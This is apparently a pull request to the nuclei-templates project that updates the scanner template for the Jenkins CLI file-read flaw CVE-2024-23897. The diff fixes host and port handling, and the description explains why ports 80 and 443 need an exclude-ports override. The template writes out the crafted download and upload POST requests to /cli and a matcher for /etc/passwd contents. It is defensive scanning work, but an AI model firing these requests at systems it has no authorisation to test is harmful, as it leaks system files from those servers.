### PR TITLE
Update CVE-2024-23897

### DIFF
--- a/javascript/cves/2024/CVE-2024-23897.yaml
+++ b/javascript/cves/2024/CVE-2024-23897.yaml
@@ -39,16 +39,18 @@ javascript:
       isPortOpen(Host,Port);
     code: |
       let m = require('nuclei/net');
-      let name=(Host.includes(':') ? Host : Host+":80");
+      let address = Host+":"+Port;
       let conn,conn2;
-      try { conn = m.OpenTLS('tcp', name) } catch { conn=  m.Open('tcp', name)}
+      try { conn = m.OpenTLS('tcp', address) } catch { conn=  m.Open('tcp', address)}
       conn.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: download\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 0\r\n\r\n');
-      try { conn2 = m.OpenTLS('tcp', name) } catch { conn2=  m.Open('tcp', name)}
+      try { conn2 = m.OpenTLS('tcp', address) } catch { conn2=  m.Open('tcp', address)}
       conn2.Send('POST /cli?remoting=false HTTP/1.1\r\nHost:'+Host+'\r\nContent-type: application/octet-stream\r\nSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92\r\nSide: upload\r\nConnection: keep-alive\r\nContent-Length: 163\r\n\r\n'+Body)
       resp = conn.RecvString(1000)
     args:
       Body: "{{payload}}"
-      Host: "{{Hostname}}"
+      Host: "{{Host}}"
+      Port: "80" # if port not specified, default to 80
+      exclude-ports: "0" # override default skip list of 80,443,8080,8443
 
     matchers:
       - type: dsl
@@ -60,4 +62,3 @@ javascript:
         group: 1
         regex:
           - '\b([a-z_][a-z0-9_-]{0,31})\:x\:'
-# digest: 490a0046304402206177320674364c9d4ca08784b566ee26f51797e931f44e2344b29753e9eb7f4f02200b80670626fb457ae4142d6b191740d2c0e7d499b6a08f246a375ddd7abc4e86:922c64590222798bb761d5b6d8e72950

--- a/javascript/cves/2024/CVE-2024-23897.yaml
+++ b/javascript/cves/2024/CVE-2024-23897.yaml
@@ -49,7 +49,7 @@ javascript:
     args:
       Body: "{{payload}}"
       Host: "{{Host}}"
-      Port: "80" # if port not specified, default to 80
+      Port: 80,443 # if port not specified, defaults to both 80 and 443
       exclude-ports: "0" # override default skip list of 80,443,8080,8443
 
     matchers:


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
> context https://github.com/projectdiscovery/nuclei/pull/4123
>## tldr;
> basically when running network and javascript templates if given input using `-u` or `-l` has 80,443,8443,8080 nuclei strips them assuming that these ports were intended for http protocols and not raw tcp protocols

>[!NOTE]
> Hence whenever we use `Port` Field in network or javascript templates but are making a http request we need to override default excluded port list using `exclude-ports` , and this overrides the default exclude list of `80,443,8080,8443` with specified comma seperated values

- A more long term fix for this is to support `service` similar to `port` and specify `service: http` but it is more of a long term fix when we introduce service discovery as part of nuclei as optimization
- also `Port` field support CSV values if we intend to run it on multiple ports 

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)